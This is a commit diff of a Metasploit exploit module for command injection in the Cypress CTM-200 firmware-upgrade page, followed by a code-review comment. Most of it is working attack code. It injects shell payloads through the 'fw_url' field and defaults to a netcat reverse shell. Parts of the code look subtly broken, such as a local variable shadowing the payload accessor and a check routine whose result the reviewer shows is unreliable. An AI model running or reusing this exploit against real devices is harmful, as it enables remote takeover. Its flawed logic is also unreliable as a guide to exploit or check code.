Update module to include modified recommendations
0x45dd committed Aug 28, 2024
1 parent 74943a4 commit ffcf08b
Showing 1 changed file with 39 additions and 37 deletions.
76 changes: 39 additions & 37 deletions modules/exploits/linux/http/cypress_ctm200_command_injection.rb
@@ -1,15 +1,11 @@
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'
require 'uri'

class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking

include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::CmdStager

def initialize(info = {})
super(
@@ -37,33 +33,33 @@ def initialize(info = {})
'BadChars' => ''
},
'Platform' => ['unix'],
'Arch' => [ARCH_CMD],
'Targets' => [['Automatic', {}]],
'Arch' => [ARCH_CMD, ARCH_ARM],
'Targets' => [
['Automatic', {}],
['ARM Linux', { 'Arch' => ARCH_ARM }]
],
'DefaultTarget' => 0,
'DisclosureDate' => '2021-09-21',
'DefaultOptions' => {
'PAYLOAD' => 'linux/x86/meterpreter/reverse_tcp'
'PAYLOAD' => 'cmd/unix/reverse_netcat'
}
)
)

register_options(
[
OptString.new('TARGETURI', [true, 'The base path to the vulnerable application', '/cgi-bin/webif/ctm-config-upgrade.sh']),
OptString.new('RHOST', [true, 'The target address']),
OptString.new('LHOST', [true, 'The local host for reverse shell']),
OptString.new('LPORT', [true, 'The local port for reverse shell'])
OptString.new('TARGETURI', [true, 'The base path to the vulnerable application', '/'])
]
)
end

def check
# Generate a random string to use in our payload
unique_string = "echo '#{Rex::Text.rand_text_alphanumeric(10..15)}'"

# Construct the payload with the unique_string
payload = "`#{unique_string}`"

# Prepare the POST request to test the vulnerability
data = {
'submit' => '1',
@@ -72,48 +68,54 @@ def check
'install_fw_url' => 'Start Firmware Upgrade from URL',
'pkgurl' => ''
}

# Send the POST request to the target
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri.path),
'uri' => normalize_uri(target_uri.path, 'cgi-bin/webif/ctm-config-upgrade.sh'),
'vars_post' => data
})

unless res
vprint_error 'Connection failed'
return CheckCode::Unknown
end

# Check if the random string is in the response body
if res.code == 200 && res.body.include?(unique_string)
return CheckCode::Vulnerable
end

CheckCode::Safe
end

def exploit
payload = "#{payload.encoded}"
data = {
'submit' => '1',
'upgradefile' => '',
'fw_url' => payload,
'install_fw_url' => 'Start Firmware Upgrade from URL',
'pkgurl' => ''
}
if target.name == 'ARM Linux'
# Use CmdStager for ARM payloads
cmd_exec payload.encoded
else
# For command-based payloads
payload = "#{payload.encoded}"
data = {
'submit' => '1',
'upgradefile' => '',
'fw_url' => payload,
'install_fw_url' => 'Start Firmware Upgrade from URL',
'pkgurl' => ''
}

res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri.path),
'vars_post' => data,
'rport' => rport
})
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, 'cgi-bin/webif/ctm-config-upgrade.sh'),
'vars_post' => data,
'rport' => rport
})

if res && res.code == 200
print_good('Exploit sent successfully. Listening meterpreter shell')
else
print_error('Exploit failed. Target may not be vulnerable.')
if res && res.code == 200
print_good('Exploit sent successfully. Listening for payload')
else
print_error('Exploit failed. Target may not be vulnerable.')
end
end
end
end
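Review bot: In `check`, the response body is compared with `unique_string`, which holds the whole command text (`echo '<random>'`) rather than the random token alone. The test would therefore report Vulnerable when the page merely reflects the submitted field, and Safe when the command ran and only the token came back, so the result is unreliable for anyone using it to assess exposure. Keep the token in its own variable, `marker = Rex::Text.rand_text_alphanumeric(10..15)`, build the probe string from it, and match on `res.body.include?(marker)` while separately ruling out a plain reflection of the submitted string. The local named `payload` in `check` also shadows the framework's payload accessor; a name such as `probe` would read more clearly. Part of `check`'s `data` hash is collapsed on this page, so how the probe reaches the request is not visible here.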